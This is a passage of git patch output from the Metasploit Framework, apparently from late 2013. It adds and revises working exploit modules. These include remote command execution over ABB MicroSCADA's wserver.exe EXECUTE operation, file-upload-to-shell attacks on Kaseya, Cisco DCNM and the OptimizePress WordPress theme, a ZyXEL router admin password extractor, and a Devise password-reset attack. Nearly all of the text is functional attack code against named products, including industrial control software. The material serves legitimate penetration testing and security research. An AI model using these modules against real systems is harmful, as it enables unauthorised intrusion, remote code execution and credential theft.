+  # Download the artifact from the remote system if it exists.
+  #
+  def download_artifact(profile, opts={})
+    name = opts[:name]
+
+    print_status("Checking for #{name} artifacts...")
+    if !check_artifact(profile, opts)
+      print_error("#{name} directory not found for #{profile['UserName']}")
+      return false
+    end
+
+    print_good("#{name} directory found #{profile['UserName']}")
+
+    fname = opts[:fname]
+    dir = opts[:dir]
+    path = opts[:path]
+
+    artifact_path = "#{profile[path]}\\#{dir}"
+    file = session.fs.file.search(artifact_path, "#{fname}", true)
+
+    return false unless file
+
     file.each do |db|
       guid = db['path'].split('\\')
-      # Using store_local for full control of output filename.  Forensics software can be picky about the files it's given.
-      file_loc = store_local("artifact","#{opts[:artifact_filetype]}",session,"#{opts[:profile]['UserName']}_#{opts[:artifact_name]}_#{guid.last}_#{opts[:artifact_filename]}")
+      # Using store_local for full control of output filename. Forensics software can be picky about the files it's given.
+      local_loc = "#{profile['UserName']}_#{name}_#{guid.last}_#{fname}"
+      file_loc = store_local("artifact", STORE_FILE_TYPE, session, local_loc)
       maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
       print_status("Downloading #{maindb}")
-      session.fs.file.download_file(file_loc,maindb)
-      print_good("#{opts[:artifact_name]} artifact file saved to #{file_loc}")
+      session.fs.file.download_file(file_loc, maindb)
+      print_good("#{name} artifact file saved to #{file_loc}")
     end
+    return true
   end
-end
+end
\ No newline at end of file

From d1e4975f762304e05966c7b4673a965565926929 Mon Sep 17 00:00:00 2001
From: Thomas Hibbert <thomas.hibbert@security-assessment.com>
Date: Thu, 28 Nov 2013 16:35:36 +1300
Subject: [PATCH 125/217] Use res.get_cookies instead of homebrew parse. Use
 _cgi

---
 .../http/kaseya_uploadimage_file_upload.rb    | 31 +++++++------------
 1 file changed, 11 insertions(+), 20 deletions(-)

diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
index d33ae5d8fa..a73caed524 100644
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'POST',
       'uri'    => normalize_uri('SystemTab','uploadImage.asp')
     })
-    
+
     # the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
 
     if not res or res.code != 500
@@ -53,21 +53,6 @@ class Metasploit3 < Msf::Exploit::Remote
     return Exploit::CheckCode::Appears
   end
 
-  def get_cookie
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
-    })
-
-    if res and res.headers['Set-Cookie']
-      cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
-    else
-      fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
-    end
-
-    cookie
-  end
-
   def exploit
     peer = "#{rhost}:#{rport}"
 
@@ -80,8 +65,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
     data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
-    cookie = get_cookie
-    res = send_request_raw({
+    res = send_request_cgi({
+       'method' => 'GET',
+       'uri'    => normalize_uri("SystemTab", "uploadImage.asp")
+    })
+
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
       "method" => "POST",
       "uri"    => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
       "data"   => data,
@@ -89,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote
       "cookie" => cookie
     })
 
-    register_files_for_cleanup(@payload_name)
-
     if not res or res.code != 200
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
+    register_files_for_cleanup(@payload_name)
+
     print_status("#{peer} - Executing payload #{@payload_name}")
     res = send_request_cgi({
       'uri'    => normalize_uri(@payload_name),

From 03838aaa79fbee972fdd3701f5e3f4de94253bdb Mon Sep 17 00:00:00 2001
From: Jeff Jarmoc <jeff@jarmoc.com>
Date: Wed, 27 Nov 2013 22:27:45 -0600
Subject: [PATCH 126/217] Update rails_devise_pass_reset.rb

Fixed erroneous status if FLUSHTOKENS is false.
---
 modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
index 9dae3abeb4..8b11dc99ac 100644
--- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
+++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
@@ -145,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     # Clear outstanding reset tokens, helps ensure we hit the intended account.
-    print_status("Clearing existing tokens...")
-    clear_tokens() if datastore['FLUSHTOKENS']
-
+    if datastore['FLUSHTOKENS']
+      print_status("Clearing existing tokens...")
+      clear_tokens()
+    end
     # Generate a token for our account
     print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
     status = generate_token(datastore['TARGETEMAIL'])
@@ -163,4 +164,4 @@ class Metasploit3 < Msf::Auxiliary
     status = reset_one(datastore['PASSWORD'], true)
     status ? print_good("Password reset worked successfully") : print_error("Failed to reset password")
   end
-end
\ No newline at end of file
+end

From 1109a1d157e48580e0c37383cb3ead4f52f8e1cc Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Thu, 28 Nov 2013 11:30:02 +0530
Subject: [PATCH 127/217] Updated

---
 modules/auxiliary/scanner/http/oracle_ilom_login.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
index 780942e40a..acbdbef605 100644
--- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -23,13 +23,13 @@ class Metasploit3 < Msf::Auxiliary
         [
           'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
         ],
-      'License'        => MSF_LICENSE
+      'License'        => MSF_LICENSE,
 
-    ))
+      'DefaultOptions' => { 'SSL' => true }
+  ))
 
     register_options(
       [
-        OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true]),
         Opt::RPORT(443)
       ], self.class)
   end
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary
       res = send_request_cgi(
       {
         'uri'       => '/iPages/i_login.asp',
-        'method'    => 'GET'	
+        'method'    => 'GET'
       })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
       vprint_error("#{peer} - HTTP Connection Failed...")

From 7dee4ffd4d865e197df6832c5af4fcee5b2580f4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 28 Nov 2013 10:47:04 -0600
Subject: [PATCH 128/217] Add module for ZDI-13-270

---
 .../windows/scada/abb_wserver_exec.rb         | 115 ++++++++++++++++++
 1 file changed, 115 insertions(+)
 create mode 100644 modules/exploits/windows/scada/abb_wserver_exec.rb

diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb
new file mode 100644
index 0000000000..62c79e041c
--- /dev/null
+++ b/modules/exploits/windows/scada/abb_wserver_exec.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStagerVBS
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ABB MicroSCADA Stack Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
+        vulnerability exists on the wserver.exe component, disabled by default but required when
+        a project uses the SCIL function WORKSTATION_CALL. The issue exists on the handling of
+        EXECUTE operations, which allows unauthenticated execution of arbitrary commands. This
+        module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over Windows XP SP3
+        and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brian Gorenc', # Original discovery
+          'juan vazquez'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'OSVDB', '100324'],
+          [ 'ZDI', '13-270' ],
+          [ 'URL', 'http://www05.abb.com/global/scot/scot229.nsf/veritydisplay/41ccfa8ccd0431e6c1257c1200395574/$file/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X86,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 5
+        },
+      'Targets'        =>
+        [
+          [ 'ABB MicroSCADA Pro SYS600 9.3', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 05 2013'
+    ))
+
+    register_options([Opt::RPORT(12221)], self.class)
+  end
+
+  def check
+
+    # Send an EXECUTE packet without command, a valid response
+    # should include an error code, which is good enough to
+    # fingerprint.
+    op = "EXECUTE\x00"
+    pkt_length = [4 + op.length].pack("V") # 4 because of the packet length
+    pkt = pkt_length
+    pkt << op
+
+    connect
+    sock.put(pkt)
+    res = sock.get_once
+    disconnect
+
+    if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe10001
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    # More then 750 will trigger overflow...
+    # Cleaning is done by the exploit on execute_cmdstager_end
+    execute_cmdstager({:linemax => 750, :nodelete => true})
+  end
+
+  def execute_cmdstager_end(opts)
+    @var_tempdir = @stager_instance.instance_variable_get(:@tempdir)
+    @var_decoded = @stager_instance.instance_variable_get(:@var_decoded)
+    @var_encoded = @stager_instance.instance_variable_get(:@var_encoded)
+    @var_decoder = @stager_instance.instance_variable_get(:@var_decoder)
+    print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")
+    execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})
+    print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")
+    execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})
+    print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")
+    execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})
+  end
+
+  def execute_command(cmd, opts)
+    op = "EXECUTE\x00"
+    command = "cmd.exe /c #{cmd}"
+    pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length
+
+    pkt = pkt_length
+    pkt << op
+    pkt << command
+
+    connect
+    sock.put(pkt)
+    res = sock.get_once
+    disconnect
+
+    unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1
+      fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")
+    end
+  end
+end

From 807e2dfd31a057237ad2b4883cf029dbd6ff2010 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 28 Nov 2013 10:53:12 -0600
Subject: [PATCH 129/217] Fix title

---
 modules/exploits/windows/scada/abb_wserver_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb
index 62c79e041c..66212e350b 100644
--- a/modules/exploits/windows/scada/abb_wserver_exec.rb
+++ b/modules/exploits/windows/scada/abb_wserver_exec.rb
@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'ABB MicroSCADA Stack Buffer Overflow',
+      'Name'           => 'ABB MicroSCADA wserver.exe Remote Code Execution',
       'Description'    => %q{
         This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
         vulnerability exists on the wserver.exe component, disabled by default but required when

From 8817c0eee096b0d2c8089707770345c975ca8b50 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 28 Nov 2013 12:19:42 -0600
Subject: [PATCH 130/217] Change description a bit

Try to make this sound smoother
---
 modules/exploits/windows/scada/abb_wserver_exec.rb | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/windows/scada/abb_wserver_exec.rb b/modules/exploits/windows/scada/abb_wserver_exec.rb
index 66212e350b..11e7f5701a 100644
--- a/modules/exploits/windows/scada/abb_wserver_exec.rb
+++ b/modules/exploits/windows/scada/abb_wserver_exec.rb
@@ -16,11 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => 'ABB MicroSCADA wserver.exe Remote Code Execution',
       'Description'    => %q{
         This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The
-        vulnerability exists on the wserver.exe component, disabled by default but required when
-        a project uses the SCIL function WORKSTATION_CALL. The issue exists on the handling of
-        EXECUTE operations, which allows unauthenticated execution of arbitrary commands. This
-        module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over Windows XP SP3
-        and Windows 7 SP1.
+        issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe
+        component, which allows arbitrary commands. The component is disabled by default, but
+        required when a project uses the SCIL function WORKSTATION_CALL.
+
+        This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 over
+        Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>

From bc41120b751b1a6dbbcc1c4b9661817b8ffbe9bd Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Fri, 29 Nov 2013 12:47:47 +0530
Subject: [PATCH 131/217] Updated

---
 modules/auxiliary/scanner/http/oracle_ilom_login.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
index acbdbef605..efca387381 100644
--- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb
+++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
       return :abort
     end
 
-    if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") or res.body.include?("SetWebSessionString"))
+    if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString"))
       print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
       report_hash = {
         :host   => rhost,

From aa6280018454df1f60cc9fd59b53d2ff7f15171e Mon Sep 17 00:00:00 2001
From: Sven Vetsch / Disenchant <sven.vetsch@disenchant.ch>
Date: Fri, 29 Nov 2013 10:42:17 +0100
Subject: [PATCH 132/217] added ZyXEL GS1510-16 Password Extractor

---
 .../http/zyxel_admin_password_extractor.rb    | 68 +++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb

diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
new file mode 100644
index 0000000000..f16cb9160a
--- /dev/null
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -0,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
+      'Name'        => 'ZyXEL GS1510-16 Password Extractor',
+      'Description' => %q{
+          This module exploits a vulnerability in ZyXEL GS1510-16 routers
+          to extract the admin password.
+      },
+      'References'  =>
+        [
+        ],
+      'Author'      => [
+        'Daniel Manser', # @antsygeek
+        'Sven Vetsch' # @disenchant_ch
+      ],
+      'License'     => MSF_LICENSE
+    )
+  end
+
+  def run
+    begin
+    print_status("Trying to get 'admin' user password ...")
+    res = send_request_cgi({
+      'uri'       => "/webctrl.cgi",
+      'method'    => 'POST',
+      'vars_post' => {
+        'username' => "admin",
+        'password' => "#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}",
+        'action' => "cgi_login"
+      }
+    }, 10)
+
+    if (res && res.code == 200)
+      print_status("Got response from router.")
+    else
+      print_error('Unexpected HTTP response code.')
+      return
+    end
+
+    admin_password = ""
+    admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);
+
+    if not admin_password_matches
+      print_error('Could not obtain admin password')
+      return
+    else
+      admin_password = admin_password_matches[1];
+      print_good("Password for user 'admin' is: #{admin_password}")
+    end
+  rescue ::Rex::ConnectionError
+    print_error("#{rhost}:#{rport} - Failed to connect")
+    return
+  end
+  end
+end
\ No newline at end of file

From 691d47f3a37e09f80669f8bf005d0601d2e9eef1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 Nov 2013 23:11:44 -0600
Subject: [PATCH 133/217] Add module for ZDI-13-255

---
 .../exploits/multi/http/cisco_dcnm_upload.rb  | 142 ++++++++++++++++++
 1 file changed, 142 insertions(+)
 create mode 100644 modules/exploits/multi/http/cisco_dcnm_upload.rb

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
new file mode 100644
index 0000000000..1ed8e5a667
--- /dev/null
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Cisco Prime Data Center Network Manager Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a code execution flaw in Cisco Data Center Network Manager. The
+        vulnerability exists on the processImageSave.jsp, which can be abused through a directory
+        traversal and a null byte injection to upload arbitrary files. The autodeploy JBoss
+        application server feature is used to achieve remote code execution. This module has been
+        tested successfully on Cisco Prime Data Center Network Manager 6.1(2) on Windows 2008 R2
+        (64 bits).
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-5486'],
+          [ 'OSVDB', '97425' ],
+          [ 'ZDI', '13-255' ],
+          [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch'        => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Cisco DCNM 6.1(2) / Java Universal',
+            {
+              'AutoDeployPath' => "../../../../../deploy",
+              'CleanupPath'    => "../../jboss-4.2.2.GA/server/fm/deploy"
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 18 2013'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to Cisco DCNM', '/'])
+      ], self.class)
+  end
+
+  def upload_file(location, filename, contents)
+    res = send_request_cgi(
+      {
+        'uri'         => normalize_uri(target_uri.path, "cues_utility", "charts", "processImageSave.jsp"),
+        'method'      => 'POST',
+        'encode_params' => false,
+        'vars_post'   =>
+          {
+            "mode"     => "save",
+            "savefile" => "true",
+            "chartid"  => "#{location}/#{filename}%00",
+            "data"     => Rex::Text.uri_encode(Rex::Text.encode_base64(contents))
+          }
+      })
+
+    if res and res.code == 200 and res.body.to_s =~ /success/
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    version = ""
+
+    res = send_request_cgi({
+      'url'    => target_uri.to_s,
+      'method' => 'GET'
+    })
+
+    if res and
+        res.code == 200 and
+        res.body.to_s =~ /Data Center Network Manager/ and
+        res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
+      version = $1
+      print_status("Cisco Primer Data Center Network Manager version #{version} found")
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    if version =~ /6.1/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    app_base = rand_text_alphanumeric(4+rand(32-4))
+
+    # By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
+    # Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
+    # Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
+    war = payload.encoded_war({ :app_name => app_base }).to_s
+    war_filename = "#{app_base}.war"
+    war_location = target['AutoDeployPath']
+
+    print_status("#{peer} - Uploading WAR file #{war_filename}...")
+    res = upload_file(war_location, war_filename, war)
+
+    if res
+      register_files_for_cleanup("#{target['CleanupPath']}/#{war_filename}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to upload the WAR payload")
+    end
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi(
+        {
+          'uri'    => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+          'method' => 'GET'
+        })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+  end
+
+end

From 0a7c0eea7834f0ddd584c8719c5b91ffde9f5c11 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 Nov 2013 23:13:07 -0600
Subject: [PATCH 134/217] Fix references

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index 1ed8e5a667..4ddad87080 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -31,8 +31,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'  =>
         [
           [ 'CVE', '2013-5486'],
-          [ 'OSVDB', '97425' ],
-          [ 'ZDI', '13-255' ],
+          [ 'OSVDB', '97426' ],
+          [ 'ZDI', '13-254' ],
           [ 'URL', 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
         ],
       'Privileged'  => true,

From 749e6bd65b52e44d86312caae5bd7724bee470d7 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 30 Nov 2013 09:46:22 -0600
Subject: [PATCH 135/217] Do better check method

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index 4ddad87080..e32d401905 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -86,14 +86,18 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'GET'
     })
 
-    if res and
-        res.code == 200 and
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.code == 200 and
         res.body.to_s =~ /Data Center Network Manager/ and
         res.body.to_s =~ /<div class="productVersion">Version: (.*)<\/div>/
       version = $1
       print_status("Cisco Primer Data Center Network Manager version #{version} found")
-    else
-      return Exploit::CheckCode::Safe
+    elsif res.code == 200 and
+        res.body.to_s =~ /Data Center Network Manager/
+      return Exploit::CheckCode::Detected
     end
 
     if version =~ /6.1/

From 3417c4442a6e20aa7af9ca0b0277f6af4a895f9b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 30 Nov 2013 09:47:34 -0600
Subject: [PATCH 136/217] Make check really better

---
 modules/exploits/multi/http/cisco_dcnm_upload.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb
index e32d401905..369115a4d9 100644
--- a/modules/exploits/multi/http/cisco_dcnm_upload.rb
+++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb
@@ -98,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote
     elsif res.code == 200 and
         res.body.to_s =~ /Data Center Network Manager/
       return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
     end
 
     if version =~ /6.1/

From 045b848a30389c7b13bdc9cb9e6a0c92023a06d5 Mon Sep 17 00:00:00 2001
From: Mekanismen <mattias@gotroot.eu>
Date: Sat, 30 Nov 2013 21:51:56 +0100
Subject: [PATCH 137/217] added exploit module for optimizepress

---
 .../webapp/php_wordpress_optimizepress.rb     | 143 ++++++++++++++++++
 1 file changed, 143 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/php_wordpress_optimizepress.rb

diff --git a/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
new file mode 100644
index 0000000000..f725a751d5
--- /dev/null
+++ b/modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
@@ -0,0 +1,143 @@
+require 'msf/core'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'WordPress OptimizePress Themes File Upload Vulnerability',
+      'Description'     => %q{
+        This module exploits a PHP file upload vulnerability against the Wordpress theme
+        OptimizePress.
+      },
+      'Author'          =>
+      [
+        'United of Muslim Cyber Army', # Vulnerability discovery
+        'Mekanismen', # Metasploit module
+      ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+      [
+      ],
+      'Privileged'      => false,
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Payload'         =>
+      {
+      'DisableNops'     => true,
+      },
+      'Targets'         => [ ['OptimizePress', {}] ],
+      'DefaultTarget'   => 0,
+      'DisclosureDate'  => 'Nov 29 2013'
+      ))
+  end
+
+  def check
+    uri = target_uri.path
+    res = send_request_cgi({
+    'method'   => 'GET',
+    'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+    })
+
+    if res and res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    uri = normalize_uri(target_uri.path)
+    peer = "#{rhost}:#{rport}"
+
+    #get upload filepath
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
+    end
+
+    html = Nokogiri::HTML(res.body)
+    filepath = html.xpath("//*[@id='imgpath']").attr("value")
+
+    if filepath == "" or filepath == nil
+      fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
+    end
+
+    #set cookie
+    cookie = res.headers['Set-Cookie']
+
+    filename = rand_text_alphanumeric(8) + ".php"
+
+    #upload payload
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#{filename}\"")
+    post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
+    post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
+    post_data.add_part("#{filepath}", nil, nil, "form-data; name=\"imgpath\"")
+
+    print_status("#{peer} - Sending PHP payload")
+
+    n_data = post_data.to_s
+    n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php'),
+      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
+      'data' => n_data,
+      'headers' => {
+        'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
+      },
+      'cookie' => cookie
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
+    else
+       print_good("#{peer} - Payload uploaded successfully")
+    end
+
+    #get path to payload
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
+    })
+
+    if not res or res.code != 200
+      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
+    end
+
+    payload_url = ""
+
+    html = Nokogiri::HTML(res.body)
+    elems = html.xpath("//*[@name='cs_img']")
+    for elem in elems
+      if elem.attr("value") =~ /#{filename}/
+        payload_url = elem.attr("value")
+      end
+    end
+
+    if payload_url == ""
